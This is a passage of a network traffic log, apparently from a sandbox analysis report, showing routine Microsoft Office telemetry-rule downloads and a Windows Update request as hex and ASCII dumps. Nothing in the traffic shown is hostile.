2024-12-07 12:00:04 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:04 GMT Content-Type: text/xml Content-Length: 1390 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE3002601" x-ms-request-id: 3c0425b1-401e-0047-7c03-488597000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120004Z-r1cf579d778x776bhC1EWRdk8000000002b0000000001zkr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:04 UTC	1390	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.7	49840	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:05 UTC	192	OUT	GET /rules/rule701501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:06 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:06 GMT Content-Type: text/xml Content-Length: 1401 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT ETag: "0x8DC582BE2A9D541" x-ms-request-id: 315ad4be-c01e-0014-2a03-48a6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120006Z-r1cf579d778w59f9hC1EWRze6w00000002n0000000000es9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:06 UTC	1401	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.7	49842	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:06 UTC	192	OUT	GET /rules/rule702801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:06 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:06 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: deed8991-301e-0033-2005-48fa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120006Z-r1cf579d77867vg8hC1EWR8knc000000026g000000001a3k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 12:00:06 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.7	49843	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:06 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:06 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:06 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 94f5badb-301e-0000-7603-48eecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120006Z-r1cf579d778lntp7hC1EWR9gg400000001p00000000042cn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:06 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.7	49844	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:06 UTC	192	OUT	GET /rules/rule702800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:06 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:06 GMT Content-Type: text/xml Content-Length: 1354 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0662D7C" x-ms-request-id: 123741ec-101e-008d-5b05-4892e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120006Z-r1cf579d778dndrdhC1EWR4b2400000001vg000000003pym x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:06 UTC	1354	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.7	49841	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:06 UTC	192	OUT	GET /rules/rule701500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:06 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:06 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB6AD293" x-ms-request-id: 15e9867f-c01e-0046-5804-482db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120006Z-r1cf579d778dc6d7hC1EWR2vs800000002zg000000001r8m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:06 UTC	1364	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.7	49846	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:08 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:10 UTC	515	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:10 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 5f90aa43-701e-0097-6403-48b8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120010Z-r1cf579d778qgtz2hC1EWRmgks0000000250000000001qvs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-07 12:00:10 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.7	49847	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:08 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:08 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:08 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 2d97fd60-e01e-000c-7b06-488e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120008Z-r1cf579d778z4wflhC1EWRa3h000000002eg0000000002ue x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:08 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.7	49848	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:08 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:08 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:08 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: a762f06e-601e-0084-7004-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120008Z-r1cf579d77898tqwhC1EWRf9q800000002e0000000000gbq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:08 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.7	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:08 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 12:00:08 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:00:08 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: c22706de-601e-00ab-7503-4866f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T120008Z-r1cf579d7784wpmvhC1EWRk4cn00000001tg000000001c8v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 12:00:08 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.7	49851	52.149.20.212	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:10 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PpmzE7nWNbHrURx&MD=ocWWztpu HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-07 12:00:11 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 01a64dc1-ef0b-4abd-a011-01b65c2741a1 MS-RequestId: 8b0bed4a-7b6b-445a-b390-8574b471c34f MS-CV: uwv94d8KFkSOdMxm.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 07 Dec 2024 12:00:10 GMT Connection: close Content-Length: 30005
2024-12-07 12:00:11 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-12-07 12:00:11 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.7	49853	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 12:00:10 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
